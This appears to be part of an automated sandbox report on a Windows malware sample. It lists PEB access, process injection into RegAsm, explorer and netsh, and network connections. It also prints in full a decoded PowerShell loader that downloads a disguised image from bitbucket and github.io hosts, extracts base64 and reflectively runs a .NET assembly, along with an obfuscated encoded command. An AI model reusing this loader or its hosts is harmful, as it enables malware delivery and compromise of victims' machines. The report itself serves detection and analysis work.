Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318972B mov eax, dword ptr fs:[00000030h] 6_2_0318972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C973A mov eax, dword ptr fs:[00000030h] 6_2_030C973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F72E mov eax, dword ptr fs:[00000030h] 6_2_0317F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9730 mov eax, dword ptr fs:[00000030h] 6_2_030B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F5734 mov eax, dword ptr fs:[00000030h] 6_2_030F5734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102750 mov eax, dword ptr fs:[00000030h] 6_2_03102750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03144755 mov eax, dword ptr fs:[00000030h] 6_2_03144755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F674D mov esi, dword ptr fs:[00000030h] 6_2_030F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F674D mov eax, dword ptr fs:[00000030h] 6_2_030F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D3740 mov eax, dword ptr fs:[00000030h] 6_2_030D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03193749 mov eax, dword ptr fs:[00000030h] 6_2_03193749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0750 mov eax, dword ptr fs:[00000030h] 6_2_030C0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB765 mov eax, dword ptr fs:[00000030h] 6_2_030BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C8770 mov eax, dword ptr fs:[00000030h] 6_2_030C8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 mov eax, dword ptr fs:[00000030h] 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F78A mov eax, dword ptr fs:[00000030h] 6_2_0317F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C07AF mov eax, dword ptr fs:[00000030h] 6_2_030C07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031937B6 mov eax, dword ptr fs:[00000030h] 6_2_031937B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF7BA mov eax, dword ptr fs:[00000030h] 6_2_030BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314F7AF mov eax, dword ptr fs:[00000030h] 6_2_0314F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031497A9 mov eax, dword ptr fs:[00000030h] 6_2_031497A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED7B0 mov eax, dword ptr fs:[00000030h] 6_2_030ED7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C57C0 mov eax, dword ptr fs:[00000030h] 6_2_030C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031407C3 mov eax, dword ptr fs:[00000030h] 6_2_031407C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E27ED mov eax, dword ptr fs:[00000030h] 6_2_030E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CD7E0 mov ecx, dword ptr fs:[00000030h] 6_2_030CD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C47FB mov eax, dword ptr fs:[00000030h] 6_2_030C47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D260B mov eax, dword ptr fs:[00000030h] 6_2_030D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F1607 mov eax, dword ptr fs:[00000030h] 6_2_030F1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102619 mov eax, dword ptr fs:[00000030h] 6_2_03102619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FF603 mov eax, dword ptr fs:[00000030h] 6_2_030FF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E609 mov eax, dword ptr fs:[00000030h] 6_2_0313E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C3616 mov eax, dword ptr fs:[00000030h] 6_2_030C3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C262C mov eax, dword ptr fs:[00000030h] 6_2_030C262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE627 mov eax, dword ptr fs:[00000030h] 6_2_030DE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF626 mov eax, dword ptr fs:[00000030h] 6_2_030BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F6620 mov eax, dword ptr fs:[00000030h] 6_2_030F6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195636 mov eax, dword ptr fs:[00000030h] 6_2_03195636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F8620 mov eax, dword ptr fs:[00000030h] 6_2_030F8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DC640 mov eax, dword ptr fs:[00000030h] 6_2_030DC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA660 mov eax, dword ptr fs:[00000030h] 6_2_030FA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F9660 mov eax, dword ptr fs:[00000030h] 6_2_030F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318866E mov eax, dword ptr fs:[00000030h] 6_2_0318866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F2674 mov eax, dword ptr fs:[00000030h] 6_2_030F2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314368C mov eax, dword ptr fs:[00000030h] 6_2_0314368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4690 mov eax, dword ptr fs:[00000030h] 6_2_030C4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD6AA mov eax, dword ptr fs:[00000030h] 6_2_030BD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC6A6 mov eax, dword ptr fs:[00000030h] 6_2_030FC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B76B2 mov eax, dword ptr fs:[00000030h] 6_2_030B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F66B0 mov eax, dword ptr fs:[00000030h] 6_2_030F66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F16CF mov eax, dword ptr fs:[00000030h] 6_2_030F16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA6C7 mov ebx, dword ptr fs:[00000030h] 6_2_030FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA6C7 mov eax, dword ptr fs:[00000030h] 6_2_030FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CB6C0 mov eax, dword ptr fs:[00000030h] 6_2_030CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F6C7 mov eax, dword ptr fs:[00000030h] 6_2_0317F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC mov eax, dword ptr fs:[00000030h] 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F36EF mov eax, dword ptr fs:[00000030h] 6_2_030F36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E6F2 mov eax, dword ptr fs:[00000030h] 6_2_0313E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031406F1 mov eax, dword ptr fs:[00000030h] 6_2_031406F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317D6F0 mov eax, dword ptr fs:[00000030h] 6_2_0317D6F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E33CED _wcsicmp,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,PrintMessageFromModule,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,memcpy,memcpy,FreeLibrary,GetProcessHeap,HeapFree, 8_2_00E33CED
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E396E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00E396E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39930 SetUnhandledExceptionFilter, 8_2_00E39930

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 91.195.240.19 80
Source: C:\Windows\explorer.exe Network Connect: 154.198.239.29 80
Source: Yara match File source: amsi64_7876.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtClose: Indirect: 0x301A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtQueueApcThread: Indirect: 0x301A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtQueueApcThread: Indirect: 0x144A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe NtClose: Indirect: 0x144A56C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 3964
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: E30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F97008
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '...'" [obfuscated encoded command string omitted; the decoded command is shown in the following powershell.exe process creation entry]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@k@ei@eqb0@gu@cw@g@d0@i@@n@gg@d@b0@cc@ow@n@@o@j@bc@hk@d@bl@hm@mg@g@d0@i@@n@h@@cw@6@c8@lw@n@ds@dq@k@cq@b@bm@hm@z@bm@hm@z@bn@c@@pq@g@c@@j@bc@hk@d@bl@hm@i@@r@cq@qgb5@hq@zqbz@di@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bs@gk@bgbr@hm@i@@9@c@@q@@o@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbi@gk@d@bi@hu@ywbr@gu@d@@u@g8@cgbn@c8@zwbm@gg@z@bq@gs@z@bk@c8@agbo@gg@a@bo@gg@a@bo@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@kq@s@c@@k@@k@gw@zgbz@gq@zgbz@gq@zw@g@cs@i@@n@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@
ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@h
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009C28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd}
Source: explorer.exe, 00000007.00000000.1519060398.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1516744787.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2655281517.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000002.2654770366.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1516382431.00000000012E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
